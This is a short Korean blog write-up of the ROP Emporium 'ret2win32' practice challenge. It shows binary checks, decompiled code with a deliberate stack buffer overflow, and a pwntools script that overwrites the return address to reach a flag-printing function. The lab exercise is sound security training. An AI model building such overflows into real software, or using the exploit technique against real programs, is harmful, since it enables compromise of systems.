file ret2win32
ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1596c11f85b3ed0881193fe40783e1da685b851, not stripped
checksec ret2win32
[*] '/root/ropemporium/ret2win32/ret2win32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
cdecl은 x86 C compiler의 default calling convention이라고 한다.
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(_bss_start, 0, 2, 0);
puts("ret2win by ROP Emporium");
puts("x86\n");
pwnme();
puts("\nExiting");
return 0;
}
int pwnme()
{
_BYTE s[40]; // [esp+0h] [ebp-28h] BYREF
memset(s, 0, 0x20u);
puts("For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!");
puts("What could possibly go wrong?");
puts("You there, may I have your input please? And don't worry about null bytes, we're using read()!\n");
printf("> ");
read(0, s, 0x38u);
return puts("Thank you!");
}
int ret2win()
{
puts("Well done! Here's your flag:");
return system("/bin/cat flag.txt");
}
from pwn import *
p=process('./ret2win32')
payload=b'A'*44
payload+=p32(0x804862c)
p.send(payload)
p.interactive()
'ROP emporium' 카테고리의 다른 글
split32 (0) | 2024.11.21 |
---|---|
ret2win (0) | 2024.11.17 |